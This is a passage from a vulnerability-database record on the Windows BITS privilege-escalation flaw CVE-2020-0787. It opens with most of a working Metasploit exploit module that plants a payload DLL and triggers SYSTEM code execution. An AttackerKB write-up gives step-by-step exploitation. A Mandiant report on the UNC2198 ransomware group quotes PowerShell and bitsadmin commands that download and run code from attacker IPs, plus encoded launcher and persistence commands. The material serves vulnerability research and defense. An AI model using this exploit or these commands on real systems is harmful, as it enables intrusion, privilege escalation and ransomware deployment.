'Target is running Windows, but it is not a version this module supports! 
Bailing...')\n end\n end\n\n def check_target_and_payload_match_and_supported(client_arch)\n if (client_arch != ARCH_X64) && (client_arch != ARCH_X86)\n fail_with(Failure::BadConfig, 'This exploit currently only supports x86 and x64 targets!')\n end\n payload_arch = payload.arch.first # TODO: Add missing documentation for payload.arch, @wvu used this first but it is not documented anywhere.\n if (payload_arch != ARCH_X64) && (payload_arch != ARCH_X86)\n fail_with(Failure::BadConfig, \"Unsupported payload architecture (#{payload_arch})\") # Unsupported architecture, so return an error.\n end\n if ((client_arch == ARCH_X64) && (payload_arch != ARCH_X64)) || ((client_arch == ARCH_X86) && (payload_arch != ARCH_X86))\n fail_with(Failure::BadConfig, \"Payload architecture (#{payload_arch}) doesn't match the architecture of the target (#{client_arch})!\")\n end\n end\n\n def check_windowscoredeviceinfo_dll_exists_on_target\n # Taken from bwatters-r7's cve-2020-0688_service_tracing.rb code.\n #\n # We are going to overwrite the WindowsCoreDeviceInfo.dll DLL as part of our exploit.\n # The second part of this exploit will trigger a Update Session to be created so that this DLL\n # is loaded, which will result in arbitrary code execution as SYSTEM.\n #\n # To prevent any errors, we will first check that this file doesn't exist and ask the user if they are sure\n # that they want to overwrite the file.\n win_dir = session.sys.config.getenv('windir')\n normal_target_payload_pathname = \"#{win_dir}\\\\System32\\\\WindowsCoreDeviceInfo.dll\"\n wow64_target_payload_pathname = \"#{win_dir}\\\\Sysnative\\\\WindowsCoreDeviceInfo.dll\"\n wow64_existing_file = \"#{win_dir}\\\\Sysnative\\\\win32k.sys\"\n if file?(wow64_existing_file)\n if file?(wow64_target_payload_pathname)\n print_warning(\"#{wow64_target_payload_pathname} already exists\")\n print_warning('If it is in use, the overwrite will fail')\n unless datastore['OVERWRITE_DLL']\n print_error('Change OVERWRITE_DLL option to 
true if you would like to proceed.')\n fail_with(Failure::BadConfig, \"#{wow64_target_payload_pathname} already exists and OVERWRITE_DLL option is false\")\n end\n end\n target_payload_pathname = wow64_target_payload_pathname\n elsif file?(normal_target_payload_pathname)\n print_warning(\"#{normal_target_payload_pathname} already exists\")\n print_warning('If it is in use, the overwrite will fail')\n unless datastore['OVERWRITE_DLL']\n print_error('Change OVERWRITE_DLL option to true if you would like to proceed.')\n fail_with(Failure::BadConfig, \"#{normal_target_payload_pathname} already exists and OVERWRITE_DLL option is false\")\n end\n target_payload_pathname = normal_target_payload_pathname\n end\n target_payload_pathname\n end\n\n def launch_background_injectable_notepad\n print_status('Launching notepad to host the exploit...')\n notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{process.pid} launched.\")\n process\n rescue Rex::Post::Meterpreter::RequestError\n # Sandboxes could not allow to create a new process\n # stdapi_sys_process_execute: Operation failed: Access is denied.\n print_error('Operation failed. 
Trying to elevate the current process...')\n process = client.sys.process.open\n process\n end\n\n def exploit\n # NOTE: Automatic check is implemented by the AutoCheck mixin\n super\n\n # Step 1: Check target environment is correct.\n print_status('Step #1: Checking target environment...')\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n client_arch = sysinfo['Architecture']\n check_target_is_running_supported_windows_version\n check_target_and_payload_match_and_supported(client_arch)\n check_windowscoredeviceinfo_dll_exists_on_target\n\n # Step 2: Generate the malicious DLL and upload it to a temp location.\n print_status('Step #2: Generating the malicious DLL...')\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787')\n datastore['EXE::Path'] = path\n if client_arch =~ /x86/i\n datastore['EXE::Template'] = ::File.join(path, 'template_x86_windows.dll')\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787', 'CVE-2020-0787.x86.dll')\n library_path = ::File.expand_path(library_path)\n elsif client_arch =~ /x64/i\n datastore['EXE::Template'] = ::File.join(path, 'template_x64_windows.dll')\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787', 'CVE-2020-0787.x64.dll')\n library_path = ::File.expand_path(library_path)\n end\n\n payload_dll = generate_payload_dll\n print_status(\"Payload DLL is #{payload_dll.length} bytes long\")\n temp_directory = session.sys.config.getenv('%TEMP%')\n malicious_dll_location = \"#{temp_directory}\\\\\" + Rex::Text.rand_text_alpha(6..13) + '.dll'\n write_file(malicious_dll_location, payload_dll)\n register_file_for_cleanup(malicious_dll_location)\n\n # Step 3: Load the main DLL that will trigger the exploit and conduct the arbitrary file copy.\n print_status('Step #3: Loading the exploit DLL to run the main exploit...')\n process = launch_background_injectable_notepad\n\n print_status(\"Injecting DLL into 
#{process.pid}...\")\n exploit_mem, offset = inject_dll_into_process(process, library_path)\n\n dll_info_parameter = malicious_dll_location.to_s\n payload_mem = inject_into_process(process, dll_info_parameter)\n\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation.\n print_status('DLL injected. Executing injected DLL...')\n process.thread.create(exploit_mem + offset, payload_mem)\n\n print_status(\"Sleeping for #{datastore['JOB_WAIT_TIME']} seconds to allow the exploit to run...\")\n sleep datastore['JOB_WAIT_TIME']\n\n register_file_for_cleanup('C:\\\\Windows\\\\System32\\\\WindowsCoreDeviceInfo.dll') # Register this file for cleanup so that if we fail, then the file is cleaned up.\n # Normally we can't delete this file though as there will be a SYSTEM service that has a handle to this file.\n\n print_status(\"Starting the interactive scan job...\")\n # Step 4: Execute `usoclient StartInteractiveScan` to trigger the payload\n # XXX Using session.shell_command_token over cmd_exec() here as @wvu-r7 noticed cmd_exec() was broken under some situations.\n session.shell_command_token('usoclient StartInteractiveScan')\n\n print_status(\"Enjoy the shell!\")\n end\nend", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-08-09T15:54:40", "description": "# CVE-2020-0787-EXP-ALL-WINDOWS-VERSION\n\n...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-16T08:57:51", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", 
"cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0787"], "modified": "2022-08-09T07:26:02", "id": "FACAC587-D738-561E-B976-3A97B6202667", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "attackerkb": [{"lastseen": "2022-06-20T05:04:15", "description": "An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) improperly handles symbolic links, aka \u2018Windows Background Intelligent Transfer Service Elevation of Privilege Vulnerability\u2019.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at June 10, 2020 2:20am UTC reported:\n\nWrote the Metasploit module for this vulnerability which is currently sitting as a PR at <https://github.com/rapid7/metasploit-framework/pull/13554>. Let me start with an overview of this vulnerability and then explain why I believe this vulnerability is more valuable than it may initially appear to be.\n\nFirst off, as mentioned in other reviews of this bug, you can find the original writeup at <https://itm4n.github.io/cve-2020-0787-windows-bits-eop/> and the PoC at <https://github.com/itm4n/BitsArbitraryFileMove>. As described in the blog, the BITS service exposes the `Legacy Control Class` over COM. An attacker can use this to obtain a pointer to the `IBackgroundCopyGroup` interface, which contains two undocumented methods, `QueryJobInterface()` and `SetNotificationPointer()`. 
By calling the `QueryJobInterface()` method of the `IBackgroundCopyGroup` method, the attacker will get a handle to the new `IBackgroundCopyJob` interface.\n\nThe problem here is that the handle to the `IBackgroundCopyJob` group is done without proper impersonation. Normally this would not be an issue since the other methods implement impersonation properly. However, there is a catch. When adding a new job using the `IBackgroundCopyJob` interface that was returned via the method described earlier, the temporary file that BITS creates when creating a new job will be renamed via a call to `MoveFileEx()` with the permissions of the `IBackgroundCopyJob` interface. Well, since BITS runs as SYSTEM and the `IBackgroundCopyJob` interface didn\u2019t implement impersonation, guess what? It\u2019s going to copy the file as the SYSTEM user.\n\nExploitation of this vulnerability is not the most difficult in the world but it basically relies on the following process (described in <https://itm4n.github.io/cve-2020-0787-windows-bits-eop/> way better than I can explain it here, but heck I\u2019ll give it a shot):\n\n 1. Set up a temporary directory that will be our staging area and create two folders: Bait and MountPoint inside of it. \n\n 2. Upload the payload DLL within this temporary directory. \n\n 3. Create a symbolic link between MountPoint and Bait. \n\n 4. Create a new job using the `IBackgroundCopyJob` interface, whose handle is obtained by calling the `QueryJobInterface()` method of the `IBackgroundCopyGroup` interface, \n\n 5. Since the BITS job will be created in a suspended state, locate the temporary BITS job file, and set a file oplock on it so that our function will be called whenever someone tries to move the file. \n\n 6. Resume the BITS job \n\n 7. Our oplock gets hit. Delete the previous symbolic link, and create a symbolic link between the MountPoint directory and `\\RPC Control\\`. 
Create two more symbolic links to link the temporary BITS file within the MountPoint directory to the DLL we want to copy, and the sample `test.txt` file we were going to the file to so that it instead points to the protected location we would like the file to be copied to. \n\n 8. Release the oplock, and profit! \n\n\nAgain, it\u2019s probably better you look at the `How to Exploit this Vulnerability?` section of <https://itm4n.github.io/cve-2020-0787-windows-bits-eop/> for a better explanation of this; he words it much better than I do.\n\nWith this aside though, the next important thing to note is that BITS was introduced with Windows 7, which is reflected in the affected systems listed at <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0787>. Looking over this list we can see that every single version of Windows, be it Server or Workstation, is affected by this vulnerability, regardless of architecture.\n\nIn fact further examination of this bug revealed that with the PoC provided, one can very reliably obtain SYSTEM level file copies on nearly any affected machine with no interruption to its service at all. The only downside though is that SYSTEM level file copies alone are not enough to get LPE. To do this an attacker needs to combine this vulnerability with a DLL hijacking vulnerability or some other vulnerability where the placement of an arbitrary file into a protected location would grant the attacker additional privileges.\n\nIn the case of the PoC and the Metasploit module, this is achieved by taking advantage of a bug in the Windows Update Session Orchestrator service, which is well documented at <https://itm4n.github.io/usodllloader-part1/> and <https://itm4n.github.io/usodllloader-part2/>. In a nutshell, an attacker can gain SYSTEM level code execution if they can create the file `C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll` and then run the undocumented command ` usoclient StartScan` or `usoclient StartInteractiveScan`. 
Note that since the Update Session Orchestrator service only exists on Windows 10 and later, it is only possible to use this technique on those computers. With this being said though other techniques could be used to gain LPE on other Windows systems, it is just a matter of creativity.\n\nThis means that in essence, any Windows system that has not applied the March 2020 updates has a pretty universally accessible arbitrary file copy vulnerability **provided that an attacker already has local access to the system**. The only other limitation is the aforementioned DLL hijacking issue; however should an attacker account for this via vulnerabilities such as the NetMan DLL hijacking issue described at <https://itm4n.github.io/windows-server-netman-dll-hijacking/>, which affects all Windows Server editions from Windows Server 2008 R2 to Windows Server 2019, they could easily adjust this vulnerability to escalate privileges on a wide variety of systems.\n\nIn summary this is one to look out for and I can see this being weaponized in the future, however attackers will need a little bit of work to get a DLL hijacking bug working for each target they want to compromise (not that hard given that Microsoft doesn\u2019t consider DLL hijacking issues a bug and tends not to patch them), and the fact that they need local access (the main limiting factor here).\n\n**bwatters-r7** at March 20, 2020 4:00pm UTC reported:\n\n**xFreed0m** at March 12, 2020 5:28pm UTC reported:\n\nAssessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-12T00:00:00", "type": "attackerkb", "title": "CVE-2020-0787 Windows BITS Privesc", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, 
"cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0787"], "modified": "2020-07-30T00:00:00", "id": "AKB:AF37CD6E-8730-4AEF-8679-0413B491A107", "href": "https://attackerkb.com/topics/kj4yuqlCc1/cve-2020-0787-windows-bits-privesc", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-21T02:03:43", "description": "Windows COM Aggregate Marshaler in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation privilege vulnerability when an attacker runs a specially crafted application, aka \u201cWindows COM Elevation of Privilege Vulnerability\u201d. 
This CVE ID is unique from CVE-2017-0214.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-12T00:00:00", "type": "attackerkb", "title": "CVE-2017-0213", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213", "CVE-2017-0214"], "modified": "2021-07-27T00:00:00", "id": "AKB:6D4430B5-2DD4-4277-B666-3F202D23AD1B", "href": "https://attackerkb.com/topics/1PgDqHxZcV/cve-2017-0213", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}], "fireeye": [{"lastseen": "2021-10-29T00:23:57", "description": "Mandiant Advanced Practices (AP) closely tracks the shifting tactics, techniques, and procedures (TTPs) of financially motivated groups who severely disrupt organizations with ransomware. In May 2020, FireEye released a blog post detailing intrusion tradecraft associated with the deployment of MAZE. As of publishing this post, we track 11 distinct groups that have deployed MAZE ransomware. 
At the close of 2020, we noticed a shift in a subset of these groups that have started to deploy EGREGOR ransomware instead of MAZE ransomware following access acquired from ICEDID infections.\n\nSince its discovery in 2017 as a banking trojan, ICEDID evolved into a pernicious point of entry for financially motivated actors to conduct intrusion operations. In earlier years, ICEDID was deployed to primarily target banking credentials. In 2020 we observed adversaries using ICEDID more explicitly as a tool to enable access to impacted networks, and in many cases this was leading to the use of common post-exploitation frameworks and ultimately the deployment of ransomware. This blog post shines a heat lamp on the latest tradecraft of UNC2198, who used ICEDID infections to deploy MAZE or EGREGOR ransomware.\n\n#### Building an Igloo: ICEDID Infections\n\nSeparate phases of intrusions are attributed to different uncategorized (UNC) groups when discrete operations such as obtaining access are not part of a contiguous operation. Pure \u201caccess operations\u201d establish remote access into a target environment for follow-on operations actioned by a separate group. A backdoor deployed to establish an initial foothold for another group is an example of an access operation.\n\nBetween July and December 2020, an ICEDID phishing infection chain consisted of a multi-stage process involving MOUSEISLAND and PHOTOLOADER (Figure 1).\n\nFigure 1: Example UNC2420 MOUSEISLAND to ICEDID Infection Chain\n\nMOUSEISLAND is a Microsoft Word macro downloader used as the first infection stage and is delivered inside a password-protected zip attached to a phishing email (Figure 2). Based on our intrusion data from responding to ICEDID related incidents, the secondary payload delivered by MOUSEISLAND has been PHOTOLOADER, which acts as an intermediary downloader to install ICEDID. 
Mandiant attributes the MOUSEISLAND distribution of PHOTOLOADER and other payloads to [UNC2420](<https://advantage.mandiant.com/actors/threat-actor--843f8aa0-2305-579a-a08a-f2f88f7815d1>), a distribution threat cluster created by Mandiant\u2019s Threat Pursuit team. UNC2420 activity shares overlaps with the publicly reported nomenclature of \u201c_Shathak_\u201d or \u201c_TA551_\u201d.\n\nFigure 2: UNC2420 MOUSEISLAND Phishing Email\n\n#### Ice, Ice, BEACON...UNC2198\n\nAlthough analysis is always ongoing, at the time of publishing this blog post, Mandiant tracks multiple distinct threat clusters (UNC groups) of various sizes that have used ICEDID as a foothold to enable intrusion operations. The most prominent of these threat clusters is [UNC2198](<https://advantage.mandiant.com/actors/threat-actor--6fd29c05-9c32-578a-83d8-051f89ebf30b>), a group that has targeted organizations in North America across a breadth of industries. In at least five cases, UNC2198 acquired initial access from UNC2420 MOUSEISLAND to conduct intrusion operations. In 2020, Mandiant attributed nine separate intrusions to UNC2198. UNC2198\u2019s objective is to monetize their intrusions by compromising victim networks with ransomware. In July 2020, Mandiant observed UNC2198 leverage network access provided by an ICEDID infection to encrypt an environment with MAZE ransomware. As the year progressed into October and November, we observed UNC2198 shift from deploying MAZE to using EGREGOR ransomware during another Incident Response engagement. Like MAZE, EGREGOR is operated using an [affiliate model](<https://advantage.mandiant.com/reports/20-00022696>), where affiliates who deploy EGREGOR are provided with proceeds following successful encryption and extortion for payment.\n\nThe UNC2198 cluster expanded over the course of more than six months. Mandiant\u2019s December 2020 blog post on UNCs described the analytical tradecraft we use to merge and graduate clusters of activity. 
Merging UNCs is a substantial analytical practice in which indicators and tradecraft attributed to one group are scrutinized against another. Two former UNCs that shared similar modus operandi were eventually merged into UNC2198.\n\n#### The Snowball Effect of Attribution\n\nAP created UNC2198 based on a single intrusion in June 2020 involving ICEDID, BEACON, SYSTEMBC and WINDARC. UNC2198 compromised 32 systems in 26 hours during this incident; however, ransomware was not deployed. Throughout July 2020 we attributed three intrusions to UNC2198 from Incident Response engagements, including one resulting in the deployment of MAZE ransomware. In October 2020, a slew of activity at both Incident Response engagements and Managed Defense clients resulted in the creation of two new UNC groups, and another incident attributed to UNC2198.\n\nOne of the new UNC groups created in October 2020 was given the designation UNC2374. UNC2374 began as its own distinct cluster where BEACON, WINDARC, and SYSTEMBC were observed during an incident at a Managed Defense customer. Initial similarities in tooling did not constitute a strong enough link to merge UNC2374 with UNC2198 yet.\n\nTwo and a half months following the creation of UNC2374, we amassed enough data points to merge UNC2374 into UNC2198. 
Some of the data points used in merging UNC2374 into UNC2198 include:\n\n * UNC2198 and UNC2374 Cobalt Strike Team Servers used self-signed certificates with the following subject on TCP port 25055:\n\n   `C = US, ST = CA, L = California, O = Oracle Inc, OU = Virtual Services, CN = oracle.com`\n\n * UNC2198 and UNC2374 deployed WINDARC malware to identical file paths: _%APPDATA%\\teamviewers\\msi.dll_\n * The same code signing certificate used to sign a UNC2198 BEACON loader was used to sign two UNC2374 SYSTEMBC tunneler payloads.\n * UNC2374 and UNC2198 BEACON C2 servers were accessed by the same victim system within a 10-minute time window during intrusion operations.\n\nThe other UNC group created in October 2020 was given the designation UNC2414. Three separate intrusions were attributed to UNC2414, and as the cluster grew, we surfaced similarities between UNC2414 and UNC2198. A subset of the data points used to merge UNC2414 into UNC2198 include:\n\n * UNC2198 and UNC2414 BEACON servers used self-signed certificates using the following subject on TCP port 25055:\n\n   `C = US, ST = CA, L = California, O = Oracle Inc, OU = Virtual Services, CN = oracle.com`\n\n * UNC2198 and UNC2414 installed BEACON as _C:\\Windows\\int32.dll_\n * UNC2198 and UNC2414 installed the RCLONE utility as _C:\\Perflogs\\rclone.exe_\n * UNC2198 and UNC2414 were proven to be financially motivated actors that had leveraged ICEDID as initial access:\n   * UNC2198 had deployed MAZE\n   * UNC2414 had deployed EGREGOR\n\nThe merge between UNC2198 and UNC2414 was significant because it revealed UNC2198 has access to EGREGOR ransomware. The timing of the EGREGOR usage is also consistent with MAZE ransomware shutting down as [reported](<https://advantage.mandiant.com/reports/20-00022696>) by Mandiant Intelligence. 
Figure 3 depicts the timeline of related intrusions and merges into UNC2198.\n\nFigure 3: UNC2198 timeline\n\n#### UNC2198 Intrusion Flow: After Initial Access\n\nExpanding the UNC2198 cluster through multiple intrusions and merges with other UNC groups highlights the range of TTPs employed. We have pulled out some key data from all our UNC2198 intrusions to illustrate an amalgamation of capabilities used by the threat actor.\n\n_Establish Foothold_\n\nAfter obtaining access, UNC2198 has deployed additional malware using various techniques. For instance, UNC2198 used _InnoSetup_ droppers to install a WINDARC backdoor on the target host. UNC2198 also used BITS Jobs and remote PowerShell downloads to download additional tools like SYSTEMBC for proxy and tunneler capabilities. Example commands for download and execution are:\n\n```\n%COMSPEC% /C echo bitsadmin /transfer 257e http://<REDACTED>/<REDACTED>.exe %APPDATA%<REDACTED>.exe & %APPDATA%<REDACTED>.exe & del %APPDATA% <REDACTED>.exe ^> %SYSTEMDRIVE%\\WINDOWS\\Temp\\FmpaXUHFennWxPIM.txt > \\WINDOWS\\Temp\\MwUgqKjEDjCMDGmC.bat & %COMSPEC% /C start %COMSPEC% /C \\WINDOWS\\Temp\\MwUgqKjEDjCMDGmC.bat\n\n%COMSPEC% /C echo powershell.exe -nop -w hidden -c (new-object System.Net.WebClient).Downloadfile(http://<REDACTED>/<REDACTED>.exe, <REDACTED>.exe) ^> %SYSTEMDRIVE%\\WINDOWS\\Temp\\AVaNbBXzKyxktAZI.txt > \\WINDOWS\\Temp\\yoKjaqTIzJhdDLjD.bat & %COMSPEC% /C start %COMSPEC% /C \\WINDOWS\\Temp\\yoKjaqTIzJhdDLjD.bat\n```\n\nUNC2198 has used Cobalt Strike BEACON, Metasploit METERPRETER, KOADIC, and PowerShell EMPIRE offensive security tools during this phase as well.\n\n_Offensive Security Tooling_\n\nUNC2198 has used offensive security tools similar to those seen across many threat actors. UNC2198 has used BEACON in roughly 90% of their intrusions. UNC2198 installs and executes Cobalt Strike BEACON in a variety of ways, including shellcode loaders using PowerShell scripts, service executables, and DLLs. 
While the ways and means of using BEACON are not inherently unique, there are still aspects to extrapolate that shed light on UNC2198 TTPs.\n\nFocusing in on specific BEACON executables tells a different story beyond the use of the tool itself. Aside from junk code and API calls, UNC2198 BEACON and METERPRETER executables often exhibit unique characteristics of malware packaging, including odd command-line arguments visible within strings and upon execution via child processes:\n\n```\ncmd.exe /c echo TjsfoRdwOe=9931 & reg add HKCU\\SOFTWARE\\WIlumYjNSyHob /v xFCbJrNfgBNqRy /t REG_DWORD /d 3045 & exit\n\ncmd.exe /c echo ucQhymDRSRvq=1236 & reg add HKCU\\\\\\SOFTWARE\\\\\\YkUJvbgwtylk /v KYIaIoYxqwO /t REG_DWORD /d 9633 & exit\n\ncmd.exe /c set XlOLqhCejHbSNW=8300 & reg add HKCU\\SOFTWARE\\WaMgGneKhtgTTy /v LbmWADsevLywrkP /t REG_DWORD /d 3809 & exit\n```\n\nThese example commands are non-functional, as they do not modify or alter payload execution.\n\nAnother technique involves installing BEACON using a file path containing mixed Unicode-escaped and ASCII characters to evade detection:\n\n| Unicode Escaped | Unicode Unescaped |\n|---|---|\n| `C:\\ProgramData\\S\\u0443sH\\u0435\\u0430ls\\T\\u0430s\\u0441host.exe` | `C:\\ProgramData\\S\u0443sH\u0435\u0430ls\\T\u0430s\u0441host.exe` |\n\nThe executable was then executed by using a Scheduled Task named _shadowdev_:\n\n```\ncmd.exe /c schtasks /create /sc minute /mo 1 /tn shadowdev /tr C:\\\\\\ProgramData\\\\\\S\\u0443sH\\u0435\\u0430ls\\\\\\T\\u0430s\\u0441host.exe\n```\n\nWhile the previous examples are related to compiled executables, UNC2198 has also used simple PowerShell download cradles to execute Base64-encoded and compressed BEACON stagers in memory:\n\n```\npowershell -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('hxxp://5.149.253[.]199:80/auth'))\n\npowershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(\"hxxp://185.106.122[.]167:80/a\"))\n\npowershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('hxxp://195.123.233[.]157:80/casino'))\"\n```\n\n_Discovery and Reconnaissance_\n\nUNC2198 has exhibited common TTPs seen across many threat groups during discovery and reconnaissance activities. UNC2198 has used the BloodHound active directory mapping utility during intrusions from within the \u201cC:\\ProgramData\u201d and \u201cC:\\Temp\u201d directories.\n\nThe following are collective examples of various commands executed by UNC2198 over time to enumerate a compromised environment:\n\n```\narp -a\nwhoami /groups\nwhoami.exe /groups /fo csv\nwhoami /all\n\nnet user <_Redacted_>\nnet groups \"Domain Admins\" /domain\nnet group \"Enterprise admins\" /domain\nnet group \"local admins\" /domain\nnet localgroup \"administrators\" /domain\n\nnltest /domain_trusts\nnltest /dclist:<_Redacted_>\n```\n\n#### Lateral Movement and Privilege Escalation\n\nUNC2198 has used Windows Remote Management and RDP to move laterally between systems. UNC2198 has also performed remote execution of BEACON service binaries on targeted systems to move laterally. UNC2198 launches SMB BEACON using PowerShell, executing command lines such as the following:\n\n```\nC:\\WINDOWS\\system32\\cmd.exe /b /c start /b /min powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwA3ADIALw...<_Truncated_>\n```\n\nDuring one intrusion, UNC2198 used the SOURBITS privilege escalation utility to execute files on a target system. 
SOURBITS is a packaged exploit utility for [CVE-2020-0787](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0787>), which is a vulnerability that was disclosed in 2020 for _Windows Background Intelligent Transfer Service (BITS)_. SOURBITS consists of code derived from a [GitHub Repository](<https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION>) that is implemented as a command-line utility, which can execute arbitrary files with elevated privileges. UNC2198 used SOURBITS with the following components:\n\nC:\\Users\\<User>\\Downloads\\runsysO.cr \nC:\\Users\\<User>\\Downloads\\starterO.exe \n--- \n \nThe file _runsysO.cr_ is an XOR-encoded PE executable that exploits CVE-2020-0787, and based on the target system's bitness, it will drop one of two embedded SOURBITS payloads.\n\n_Data Theft, Ransomware Deployment and #TTR_\n\nLike other financially motivated threat actors, part of UNC2198\u2019s modus operandi in latter stages of intrusions involves the exfiltration of hundreds of gigabytes of the victim organizations\u2019 data before ransomware is installed. Specifically, UNC2198 has used _RCLONE, a _command line utility used to synchronize cloud storage, to aid in the exfiltration of sensitive data. In all observed cases of data theft, _RCLONE _was used by UNC2198 from the \u201c_C:\\PerfLogs\\rclone.exe_\u201d file path.\n\n\u201c_Time-to-Ransom_\" (TTR) is the delta between first-attributed _access _time and the time of ransomware deployment. TTR serves as a useful gauge of how quickly an organization needs to respond to stave off a threat actor\u2019s successful deployment of ransomware. TTR is not a perfect quantification, as external factors such as an organization\u2019s security posture can drastically affect the measurement.\n\nIn this post, the TTR of UNC2198 is measured between ICEDID activity to the deployment of ransomware. In July 2020, UNC2198 deployed MAZE ransomware using PSEXEC, and the TTR was 5.5 days. 
In October 2020, UNC2198 deployed EGREGOR ransomware using forced GPO updates, and the TTR was 1.5 days.\n\n#### Looking Forward\n\nThreat actors leveraging access obtained through mass malware campaigns to deploy ransomware is a growing trend. The efficiency of ransomware groups places a significant burden on defenders to rapidly respond before ransomware deployment. As ransomware groups continue to gain operational expertise through successful compromises, they will continue to shorten their TTR while scaling their operations. Understanding the TTPs fundamental to a specific operation like UNC2198 provides an edge to defenders in their response efforts. Our unparalleled understanding of groups like UNC2198 is translated into Mandiant Advantage. Accessing our holdings in Mandiant Advantage aids defenders in recognizing TTPs used by threat actors, assessing organizational risk, and taking action. Initial investments made into rapidly assessing a group\u2019s modus operandi pay dividends when they inevitably evolve and swap out components of their toolset. Whether it be MAZE or EGREGOR, something icy or hot, Advanced Practices will continue to pursue these unchill threat actors.\n\n#### Acknowledgements\n\nThank you to Dan Perez, Andrew Thompson, Nick Richard, Cian Lynch and Jeremy Kennelly for technical review of this content. In addition, thank you to Mandiant frontline responders for harvesting the valuable intrusion data that enables our research.\n\n#### Appendix: Malware Families\n\n[PHOTOLOADER](<https://advantage.mandiant.com/malware/malware--badb174b-5bbb-51cb-91de-615dd4a54198>) is a downloader that has been observed to download ICEDID. It makes an HTTP request for a fake image file, which is RC4-decrypted to provide the final payload. Host information is sent to the command and control (C2) via HTTP cookies. Samples have been observed to contain an embedded C2 configuration that lists the real C2 alongside a number of 